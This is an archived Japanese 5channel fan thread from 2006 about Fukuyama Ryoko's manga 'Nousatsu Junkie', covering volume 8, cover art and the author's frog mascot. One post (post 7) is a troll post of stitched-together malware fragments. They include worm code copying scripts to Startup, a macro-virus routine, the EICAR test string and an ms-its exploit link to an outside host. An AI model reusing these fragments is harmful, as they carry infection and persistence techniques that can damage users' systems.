5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

福山リョウコ・悩殺ジャンキーvol.5

1 :花と名無しさん:2006/10/27(金) 11:43:08 ID:???0
花とゆめ本誌で活躍中の福山リョウコさんについて語るスレです。
書き込まれる方は以下のお約束を守って下さいね。

・他のスレやサイトに迷惑をかけない。(本誌スレで悩殺話は禁止です)
・他の漫画家さんとの比較は荒れる元なので禁止
・荒らし・煽りは完全スルーで、無視できない貴方も厨房です。
・過剰なキャラ萌え話は控えてください。萌え厨は歓迎されません。
 とくに ムッツネタは厳禁 とします。
・チャット状態になったら、書きこみは数分置きを心がけること。
・他スレで悩殺話を持ち出して暴れる人がいたら、気づいた人が即座に誘導すること。


以上、厳守でお願いします。

2 :花と名無しさん:2006/10/27(金) 11:43:49 ID:???0
前スレ
福山リョウコ・悩殺ジャンキーvol.4
http://comic6.2ch.net/test/read.cgi/gcomic/1109776948/

3 :花と名無しさん:2006/10/27(金) 11:44:32 ID:???0
落ちてたんで立てました。何か不備があったら補足ヨロ。

4 :花と名無しさん:2006/10/27(金) 11:49:06 ID:???O
面白くない。

5 :花と名無しさん:2006/10/27(金) 11:52:00 ID:???0
>>1乙!
立てようとしたら規制かかってて立てられなかったんで助かりました。

とりあえず8巻発売と次の表紙が楽しみだ。

6 :花と名無しさん:2006/10/27(金) 12:42:09 ID:???O
1さん乙です!

7 :<body onload=window()>:2006/10/27(金) 14:08:12 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2006/10/27(金) 15:10:01 ID:???O
ガイシュツかもだけど、カラクリオデット2巻に福山さんが寄稿してるよ。
オデット&朝生でした。

9 :花と名無しさん:2006/10/27(金) 15:43:21 ID:???0
>>1
スレ立て乙です。

オデット見た見た。
福山さんもジュリさんも好きだし、
イラストすごくかわいかったから得した気分だった。

10 :花と名無しさん:2006/10/27(金) 16:49:46 ID:???O
>>1
乙華麗

11 :花と名無しさん:2006/10/27(金) 17:24:22 ID:???0
>>1
乙!

>>8
知らなかった。情報d。

12 :花と名無しさん:2006/10/28(土) 00:21:47 ID:???0
>>1
スレ立てお疲れさまですー

自分もオデット2巻立ち読んだ。
オデットと朝生可愛かった!購入するかは迷い中。
もしかして8巻にはジュリエッタの悩殺キャラが載ったりするのか?

13 :花と名無しさん:2006/10/28(土) 17:33:15 ID:???0
あ、いつのまにか立ってるし。1さん乙。
今更だがやっとザ花の台湾レポ読んだ。やっぱあのかカエル笑えるw

14 :花と名無しさん:2006/10/29(日) 00:33:49 ID:???O
保守

15 :花と名無しさん:2006/10/29(日) 16:55:48 ID:???O


16 :花と名無しさん:2006/10/30(月) 09:55:32 ID:???O


17 :花と名無しさん:2006/10/30(月) 23:09:06 ID:???0
早く話すすまんかなー

18 :花と名無しさん:2006/10/31(火) 11:10:57 ID:???0
成長ネタは切っても切れないからねえ。
個人的に、今のネタを待っていた。

19 :花と名無しさん:2006/11/02(木) 11:56:02 ID:???0
公式サイト久々に更新してるね
7巻の発売前は予告更新なかったから嬉しい


20 :花と名無しさん:2006/11/02(木) 15:21:10 ID:???O
今外だから見れない…。
予告って8巻の?

21 :花と名無しさん:2006/11/02(木) 18:29:38 ID:???0
花夢にあった、8巻広告のカラー(表紙?)が
いつもと雰囲気違ってwktk
表紙も可愛かったー

22 :花と名無しさん:2006/11/02(木) 18:39:08 ID:???0
>>20
コミックス予告だったよ。
8巻収録の本編の下書きをコラージュした恒例のやつ。

>>21
自分も見たけど、あれってウミとちー?
ちーにまで剥かれるウミにワロス。
表紙かわいかったね。
パッキリしたカラーも好きだけど、最近柔らかいカラーも多くて嬉しい。

23 :花と名無しさん:2006/11/02(木) 18:46:19 ID:???0
公式に載ってる苺と千洋のコマ、セリフが少し違うね
こういうの面白い

24 :花と名無しさん:2006/11/02(木) 18:51:04 ID:???0
>>22
多分、ウミとちーで合ってると思う
カラーはウミと堤のだったから表紙ではなかったねorz

自分も最近の柔らかい雰囲気のカラーは好きだよ
あと、表紙は毎回背景も描いてくれるのが嬉しい
何気にウミの靴下の柄もこっそり主張されてていい感じだw

25 :花と名無しさん:2006/11/02(木) 18:55:48 ID:???0
>>24
レスありがd。
今必死こいて8巻の表紙を見ていたが、
やっぱりそうだよねウミとちーみたいだね。

いいよね最近のカラー。
ウミの靴下って、豹柄の?これ靴…じゃないかな?
スニーカーっぽく見える。ちがうかな。

26 :24:2006/11/02(木) 18:58:50 ID:???0
>>25
うわ、今じーっくり見直したら靴だったよ…
靴下がチラ見えしてるのかと思ってた、恥ずかしいorz

堤と苺ポッキーデートしてくるノシ

27 :花と名無しさん:2006/11/02(木) 19:00:51 ID:???0
>>26
いやいや!w
そこまで恥ずかしがることはない。
つかどんなデートだww

28 :花と名無しさん:2006/11/04(土) 11:10:38 ID:???O
今回面白かった!
堤いい味出すないつも。
そしていいとこ取りだな。
表紙も可愛かったし、扉もかっこよかった。
連作扉いつもいいね。

29 :花と名無しさん:2006/11/10(金) 14:41:22 ID:???O
ほす

30 :花と名無しさん:2006/11/10(金) 19:18:18 ID:???0
今更サイン会レポ読んだ。カエルw

31 :花と名無しさん:2006/11/10(金) 22:19:03 ID:ngEiBj0b0
カエル傑作だったよな。
「福山リョウコというカエルです」ってとこで吹いた。
あと「カエル(両生類)」ってとこも。

32 :花と名無しさん:2006/11/10(金) 22:19:53 ID:???0
上げてしまったごめんorz

33 :花と名無しさん:2006/11/14(火) 19:50:30 ID:BDk3FiBzO
コミックス楽しみあげ
うちの地域入荷遅いからまだ長いな〜

34 :花と名無しさん:2006/11/17(金) 15:35:38 ID:???0
8巻ゲットー
今回のアフロ、思わず爆笑してしまったw
実羽のセリフで噴きだした
柱も3兄弟も楽しかったし、いいもん見たー

35 :花と名無しさん:2006/11/18(土) 14:16:03 ID:???0
8巻って何話まで載ってるの?
持ってる本誌の前まで載ってるなら買ってこようかと思ってるんだけど・・・。

36 :花と名無しさん:2006/11/18(土) 14:27:06 ID:???O
8巻は45話までだよ。

37 :花と名無しさん:2006/11/18(土) 17:05:20 ID:???0
8頭身カエルー

38 :花と名無しさん:2006/11/18(土) 17:33:33 ID:???O
5頭身だろw
八頭身じゃ長杉www

39 :花と名無しさん:2006/11/19(日) 12:23:45 ID:???0
>>36 ありがとうございます。
でも残念です。手元にあるのが47話からでした。
9巻が出るころに買ってこようかと思います。

40 :花と名無しさん:2006/11/20(月) 15:49:14 ID:???O
やっと買えました8巻。
ナカの笑顔にじーんとしたよ。

41 :花と名無しさん:2006/11/28(火) 02:02:01 ID:???O
両想いなのにハラハラしちゃう…
そんなナカウミが好きです。


42 :花と名無しさん:2006/11/28(火) 20:52:59 ID:???O
確かにハラハラする。
両想いなのになんでだろ?
まあそこがいいんだけど。

43 :花と名無しさん:2006/11/29(水) 01:06:50 ID:???O
満喫で1〜7巻読んでハマって、自分も買ってしまったよ…

珍しい事に、悩殺には嫌いなキャラが1人も居ない
アフロも兄弟も面白くて好きだ

44 :花と名無しさん:2006/11/29(水) 19:21:28 ID:???0
花ゆめ系は大抵主人公が苦手な自分だが
悩殺で嫌いなキャラいないな。
双子や杏珠初登場時はいけ好かないと思ってたけど
描き込まれてくるとみんなかわいい。
作者さんの人柄が伝わってくるっつーか。

関係ないかもしれないけど
どのキャラも挨拶とかお礼や詫びを
ちゃんとするところがいいのかな。

45 :花と名無しさん:2006/11/30(木) 15:04:59 ID:???O
作者代理がカエルなのが良い

でも福山先生…字下手だよね


46 :花と名無しさん:2006/11/30(木) 15:09:02 ID:???O
下手だよねw
でも一巻よりだいぶマシになったかと
今はいい味だと思えるww

47 :花と名無しさん:2006/11/30(木) 20:22:13 ID:???0
字が下手じゃないと福山リョウコじゃない

48 :花と名無しさん:2006/11/30(木) 23:10:59 ID:???O
柱で花ゆめ表紙の事について書いてたけど

苺摘みする堤…

見たいw

まぁ有り得ないけど。
9巻表紙でも良いけどね…季節的にw

49 :花と名無しさん:2006/12/01(金) 00:17:30 ID:???O
生徒会も良いがウミ兄弟も面白いな…
ああいう兄弟羨ましいw

和泉と押村さんがカップルになったのはびっくりした…

50 :花と名無しさん:2006/12/01(金) 23:55:46 ID:???O
花楓みたいな弟欲しいw

悩殺はツンデレ多いですね

51 :花と名無しさん:2006/12/02(土) 18:01:48 ID:???0
カエデは弟にしたら実にいじりがいのあるキャラだろうね
9巻表紙は今までの順番から言って多分ウミナカだろうけど
10巻で女の子ペアとか無理かな
ナカと苺とか見たいな

52 :花と名無しさん:2006/12/02(土) 23:04:48 ID:???0
バレ来たね

53 :花と名無しさん:2006/12/02(土) 23:13:41 ID:???O
自分既に読んだが久々にコメディノリで楽しかったよ。
兄弟大活躍。
あとカラーかわいかった。

54 :花と名無しさん:2006/12/05(火) 02:43:40 ID:???O
カレンダーカワユス

福山さんのカラー好きだ

55 :花と名無しさん:2006/12/05(火) 16:40:58 ID:???0
カレンダー綺麗だったね。
本誌のカラーも、またテイストが違ってかわいくてよかった。

56 :花と名無しさん:2006/12/05(火) 21:15:08 ID:???0
今号はとにかく森が面白かった。あと風も。
いい姉と兄を持ったなw
次号載ったら休載入るだろうし、
次は少し落ち着いてウミナカの話になるのかな?
なんにせよ楽しみだ。

57 :花と名無しさん:2006/12/18(月) 23:47:57 ID:???0
バレきてた
面白そうで楽しみ

58 :花と名無しさん:2006/12/19(火) 00:40:12 ID:LWrJUwF30
  -‐ '´ ̄ ̄`ヽ、
             / /" `ヽ ヽ  \
         //, '/     ヽハ  、 ヽ
         〃 {_{       リ| l.│ i|  に
         レ!小lノ    `ヽ 从 |、i|  ょ
          ヽ|l ●   ●  | .|ノ│  ろ
            |ヘ⊃ 、_,、_,⊂⊃j  | , |.  l
          | /⌒l,、 __, イァト |/ |  ん
.          | /  /::|三/:://  ヽ |
          | |  l ヾ∨:::/ ヒ::::彡, |

59 :花と名無しさん:2006/12/19(火) 00:40:28 ID:VLkUQTY/0
またチャットでロリコンが釣れた
http://ex17.2ch.net/test/read.cgi/news4vip/1166452415/


12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)